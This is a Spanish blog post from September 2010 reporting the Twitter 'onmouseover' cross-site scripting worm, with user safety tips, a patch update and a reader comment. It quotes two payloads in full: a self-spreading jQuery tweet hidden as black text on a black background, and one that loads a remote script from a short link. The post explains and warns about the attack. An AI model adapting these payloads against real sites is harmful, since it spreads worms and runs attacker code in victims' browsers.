Como una mancha de petróleo que sale de un buque varado o del fondo del mar, el timeline de los usuarios de twitter que entraban en la web se inhundó hoy de manchas negras.
En mi TL aparecieron dos mensajes:
http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/
Sin duda un código sencillo (de jQuery) pero bonito, en solo 140 caracteres consigue indicar que si pasas el ratón por encima va a enviarse a si mismo como mensaje del usuario actual. De paso se pone con el texto en negro sobre fondo negro para que no sepas lo que oculta.
Hay una versión de este tweet, que incluso utiliza un tipo de clase del css de Twitter: class=”modal-overlay”, reduciendo la longitud.
http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/
Este otro mensaje no es tan habilidoso, pone una letra gigante y ejecuta un script que se aloja en http://is.gd/fl9A7. Lo bueno es que si la gente de is.gd colabora y borra el enlace ya no se podrá replicar mas.
En este artículo de Sophos podemos ver que ciertos mensajes te llevan a una web porno.
Recomendaciones:
- No usar la web de Twitter sino aplicaciones externas (Seesmic, Tweetdeck, Tweetie).
- Deslogate de la web de Twitter para no caer en posibles problemas con @Anywhere
- En caso de necesidad usa http://mobile.twitter.com que parece no interpreta javascript (gracias, Guille).
- No pasar el ratón por encima del TimeLine (en especial de Twitts sospechosos)
Mas info:
Seguiremos informando….
Update (6:50 PDT, 13:50 UTC): The exploit is fully patched.
September 21st, 2010 13:45
Genial cobertura del problema!
La web para móviles es inmune a este código malicioso: http://mobile.twitter.com